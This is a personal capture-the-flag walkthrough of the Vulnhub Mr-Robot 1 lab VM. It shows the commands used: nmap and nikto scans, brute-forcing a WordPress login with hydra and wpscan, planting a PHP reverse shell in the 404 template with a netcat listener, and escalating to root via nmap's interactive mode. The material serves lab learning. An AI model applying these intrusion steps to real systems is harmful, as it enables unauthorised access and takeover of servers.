Vulnhub: Mr-Robot 1
This OS has three keys to capture, the up loader states that this is a basic vulnerability with no advanced exploitation. Let's dive right into this OS:
nmap 10.0.2.0/24 -A -Pn
This command found the Mr-Robot VM as 10.0.2.4 and found ports :80 and :443. The next course of action is to open up a web browser and see what port 80 me.
The paged opened up with a beautiful intro.
The fancy page had nothing of interest so I then took a look at the 10.0.2.4/robots.txt
So there is our first key:
wget 10.0.2.4/key-1-of-3.txt
Downloading also what appears to be a dictionary file
wget 10.0.2.4/fsocity.dic
Reading the first key gives us: 073403c8a58a1f80d943455fb30724b9 This appears to be a MD5 hash but after using an online de-hashing tool I was unable to un-hash this.
The dictionary file contains a slew of words in a dictionary format. Some of these words are weird and specific but doesn't give any clues.
The next tool in my arsenal was a Nikto scan:
nikto -h 10.0.2.4
This scan indicated that this website is hosting a Wordpress content, and also that Nikto is indicating a php vulnerability... more on this further. I did notice that there was a login page for Wordpress
10.0.2.4/wp-login
Realizing that this VM is based on the TV show I gathered a list of character names from the TV's IMDB for the username. First was Elliot, I received this very specific login error when I typed password in the password field.
I then realized that we downloaded a dictionary file from our first key. I then used hydra to proceed to bruteforce our way in.
hydra -l elliot -P ~/fsocity.dic 10.0.2.4 http-post-form "/wp-login.php:log=elliot&pwd=^PASS^:ERROR"
This attempt didn't work with me so I gave up on the hydra route and decided to use the wpscan tool
wpscan -u 10.0.2.4 --wordlist ~/fsocity.dic --username elliot
After only about 4 hours I was able to get the password for elliot: ER28-0652.
Now I'm in the Wordpress admin panel and this is where I can say that I'm an amateur at this point. After looking around for some faults I remember that Nikto scan showed some php vulnerabilities. After doing extensive research I found a php reverse shell located (/usr/share/webshells/php/php-reverse-shell.php) in Kali. Opening this file in a text editor I edited what was needed.
editing the IP to the Kali's IP and using any port I copied the whole code and moved over to the admin panel in Wordpress.
I went over to the Apperance -> Editor and selected the .404 page and pasted my php shell code.
I applied my change then proceeded to open a new terminal and start listening on port 1234
nc -lvp 1234
I then went to 10.0.2.4/404, and sure enough this php reverse shell code worked
I then looked around the directories and found that the /root folder is not accessible from here, so I then went to the /home/robot folder and found two files.
The .txt file cannot be viewed using the cat command in this shell, but the md5 file was able to cat into which it read:
robot:c3fcd3d76192e4007dfb496cca67e13b
This appears to be a username and a hashed password, I then googled a md5 decrpyter and was given this password:
The only thing to do now with this is to login the VM itself:
Adding this code gives me a better shell that is familiar to me:
python -c "import pty; pty.spawn('/bin/bash');"In the VM we are able to cat the second file that I was unable to in the php shell:
After getting the second key I was at a lost on getting the third key. I was unable to get into /root because the user robot doesn't have root privileges. After reading numerous post I came across this other walkthrough that this user did here. This person shows us that launching nmap in interactive mode and then escaping the namp prompt you leave without losing root privileges.
I then gained access to /root directory and was able to get the last key:
So what did I learn after doing this VM. Well I learned the usefulness of a php reverse shell and how to properly use it. I also learned about gaining privileges through a terminal, and using a vulnerability to gain these privileges. When all is said and done I had a wonderful time working on this VM, thank you to the author who of the VM who posted it on vulnhub.com.
References: